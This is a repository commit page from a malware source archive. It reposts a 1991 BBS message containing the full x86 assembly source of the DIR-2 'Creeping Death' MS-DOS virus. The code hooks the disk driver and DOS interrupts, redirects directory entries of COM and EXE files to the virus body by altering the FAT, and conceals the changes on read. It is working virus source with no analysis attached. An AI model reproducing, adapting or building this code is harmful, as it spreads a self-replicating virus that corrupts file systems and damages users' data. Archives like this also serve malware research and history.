daniel/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2026-06-15 15:29:23 +00:00
Code Issues Projects Releases Wiki Activity

Add files via upload

Browse Source
This commit is contained in:
vxunderground
2021-01-12 17:41:47 -06:00
committed by GitHub
parent 06c1f4dfdd
commit dc888afe59
99 changed files with 42193 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
MSDOS/Virus.MSDOS.Unknown.dir2.asm
+497
View File
@@ -0,0 +1,497 @@
===========================================================================
BBS: The Programmer's Inn
Date: 11-24-91 (19:52) Number: 3544
From: AHMED DOGAN Refer#: NONE
To: ALL Recvd: NO
Subj: DIR-2 Conf: (16) VIRUS
---------------------------------------------------------------------------
; Creeping Death V 1.0
;
; (C) Copyright 1991 by VirusSoft Corp.
i13org = 5f8h
i21org = 5fch
org 100h
mov sp,600h
inc counter
xor cx,cx
mov ds,cx
lds ax,[0c1h]
add ax,21h
push ds
push ax
mov ah,30h
call jump
cmp al,4
sbb si,si
mov drive+2,byte ptr -1
mov bx,60h
mov ah,4ah
call jump
mov ah,52h
call jump
push es:[bx-2]
lds bx,es:[bx]
search: mov ax,[bx+si+15h]
cmp ax,70h
jne next
xchg ax,cx
mov [bx+si+18h],byte ptr -1
mov di,[bx+si+13h]
mov [bx+si+13h],offset header
mov [bx+si+15h],cs
next: lds bx,[bx+si+19h]
cmp bx,-1
jne search
jcxz install
pop ds
mov ax,ds
add ax,[3]
inc ax
mov dx,cs
dec dx
cmp ax,dx
jne no_boot
add [3],61h
no_boot: mov ds,dx
mov [1],8
mov ds,cx
les ax,[di+6]
mov cs:str_block,ax
mov cs:int_block,es
cld
mov si,1
scan: dec si
lodsw
cmp ax,1effh
jne scan
mov ax,2cah
cmp [si+4],ax
je right
cmp [si+5],ax
jne scan
right: lodsw
push cs
pop es
mov di,offset modify+1
stosw
xchg ax,si
mov di,offset i13org
cli
movsw
movsw
mov dx,0c000h
fdsk1: mov ds,dx
xor si,si
lodsw
cmp ax,0aa55h
jne fdsk4
cbw
lodsb
mov cl,9
sal ax,cl
fdsk2: cmp [si],6c7h
jne fdsk3
cmp [si+2],4ch
jne fdsk3
push dx
push [si+4]
jmp short death
install: int 20h
file: db "c:",255,0
fdsk3: inc si
cmp si,ax
jb fdsk2
fdsk4: inc dx
cmp dh,0f0h
jb fdsk1
sub sp,4
death: push cs
pop ds
mov bx,[2ch]
mov es,bx
mov ah,49h
call jump
xor ax,ax
test bx,bx
jz boot
mov di,1
seek: dec di
scasw
jne seek
lea si,[di+2]
jmp short exec
boot: mov es,[16h]
mov bx,es:[16h]
dec bx
xor si,si
exec: push bx
mov bx,offset param
mov [bx+4],cs
mov [bx+8],cs
mov [bx+12],cs
pop ds
push cs
pop es
mov di,offset f_name
push di
mov cx,40
rep movsw
push cs
pop ds
mov ah,3dh
mov dx,offset file
call jump
pop dx
mov ax,4b00h
call jump
mov ah,4dh
call jump
mov ah,4ch
jump: pushf
call dword ptr cs:[i21org]
ret
;--------Installation complete
i13pr: mov ah,3
jmp dword ptr cs:[i13org]
main: push ax ; driver
push cx ; strategy block
push dx
push ds
push si
push di
push es
pop ds
mov al,[bx+2]
cmp al,4 ; Input
je input
cmp al,8
je output
cmp al,9
je output
call in
cmp al,2 ; Build BPB
jne ppp ;
lds si,[bx+12h]
mov di,offset bpb_buf
mov es:[bx+12h],di
mov es:[bx+14h],cs
push es
push cs
pop es
mov cx,16
rep movsw
pop es
push cs
pop ds
mov al,[di+2-32]
cmp al,2
adc al,0
cbw
cmp [di+8-32],0
je m32
sub [di+8-32],ax
jmp short ppp
m32: sub [di+15h-32],ax
sbb [di+17h-32],0
ppp: pop di
pop si
pop ds
pop dx
pop cx
pop ax
rts: retf
output: mov cx,0ff09h
call check
jz inf_sec
call in
jmp short inf_dsk
inf_sec: jmp _inf_sec
read: jmp _read
read_: add sp,16
jmp short ppp
input: call check
jz read
inf_dsk: mov byte ptr [bx+2],4
cld
lea si,[bx+0eh]
mov cx,8
save: lodsw
push ax
loop save
mov [bx+14h],1
call driver
jnz read_
mov byte ptr [bx+2],2
call in
lds si,[bx+12h]
mov ax,[si+6]
add ax,15
mov cl,4
shr ax,cl
mov di,[si+0bh]
add di,di
stc
adc di,ax
push di
cwd
mov ax,[si+8]
test ax,ax
jnz more
mov ax,[si+15h]
mov dx,[si+17h]
more: xor cx,cx
sub ax,di
sbb dx,cx
mov cl,[si+2]
div cx
cmp cl,2
sbb ax,-1
push ax
call convert
mov byte ptr es:[bx+2],4
mov es:[bx+14h],ax
call driver
again: lds si,es:[bx+0eh]
add si,dx
sub dh,cl
adc dx,ax
mov cs:gad+1,dx
cmp cl,1
je small
mov ax,[si]
and ax,di
cmp ax,0fff7h
je bad
cmp ax,0ff7h
je bad
cmp ax,0ff70h
jne ok
bad: pop ax
dec ax
push ax
call convert
jmp short again
small: not di
and [si],di
pop ax
push ax
inc ax
push ax
mov dx,0fh
test di,dx
jz here
inc dx
mul dx
here: or [si],ax
pop ax
call convert
mov si,es:[bx+0eh]
add si,dx
mov ax,[si]
and ax,di
ok: mov dx,di
dec dx
and dx,di
not di
and [si],di
or [si],dx
cmp ax,dx
pop ax
pop di
mov cs:pointer+1,ax
je _read_
mov dx,[si]
push ds
push si
call write
pop si
pop ds
jnz _read_
call driver
cmp [si],dx
jne _read_
dec ax
dec ax
mul cx
add ax,di
adc dx,0
push es
pop ds
mov [bx+12h],2
mov [bx+14h],ax
test dx,dx
jz less
mov [bx+14h],-1
mov [bx+1ah],ax
mov [bx+1ch],dx
less: mov [bx+10h],cs
mov [bx+0eh],100h
call write
_read_: std
lea di,[bx+1ch]
mov cx,8
load: pop ax
stosw
loop load
_read: call in
mov cx,9
_inf_sec:
mov di,es:[bx+12h]
lds si,es:[bx+0eh]
sal di,cl
xor cl,cl
add di,si
xor dl,dl
push ds
push si
call find
jcxz no_inf
call write
and es:[bx+4],byte ptr 07fh
no_inf: pop si
pop ds
inc dx
call find
jmp ppp
;--------Subroutines
find: mov ax,[si+8]
cmp ax,"XE"
jne com
cmp [si+10],al
je found
com: cmp ax,"OC"
jne go_on
cmp byte ptr [si+10],"M"
jne go_on
found: test [si+1eh],0ffc0h ; >4MB
jnz go_on
test [si+1dh],03ff8h ; <2048B
jz go_on
test [si+0bh],byte ptr 1ch
jnz go_on
test dl,dl
jnz rest
pointer: mov ax,1234h
cmp ax,[si+1ah]
je go_on
xchg ax,[si+1ah]
gad: xor ax,1234h
mov [si+14h],ax
loop go_on
rest: xor ax,ax
xchg ax,[si+14h]
xor ax,cs:gad+1
mov [si+1ah],ax
go_on: ;rol cs:gad+1,1
db 2eh,0d1h,6
dw offset gad+1
add si,32
cmp di,si
jne find
ret
check: mov ah,[bx+1]
drive: cmp ah,-1
mov cs:[drive+2],ah
jne changed
push [bx+0eh]
mov byte ptr [bx+2],1
call in
cmp byte ptr [bx+0eh],1
pop [bx+0eh]
mov [bx+2],al
changed: ret
write: cmp byte ptr es:[bx+2],8
jae in
mov byte ptr es:[bx+2],4
mov si,70h
mov ds,si
modify: mov si,1234h
push [si]
push [si+2]
mov [si],offset i13pr
mov [si+2],cs
call in
pop [si+2]
pop [si]
ret
driver: mov es:[bx+12h],1
in:
db 09ah
str_block:
dw ?,70h
db 09ah
int_block:
dw ?,70h
test es:[bx+4],byte ptr 80h
ret
convert: cmp ax,0ff0h
jae fat_16
mov si,3
xor cs:[si+gad-1],si
mul si
shr ax,1
mov di,0fffh
jnc cont
mov di,0fff0h
jmp short cont
fat_16: mov si,2
mul si
mov di,0ffffh
cont: mov si,512
div si
header: inc ax
ret
counter: dw 0
dw 842h
dw offset main
dw offset rts
db 7fh
param: dw 0,80h,?,5ch,?,6ch,?
bpb_buf: db 32 dup(?)
f_name: db 80 dup(?)
;--------The End.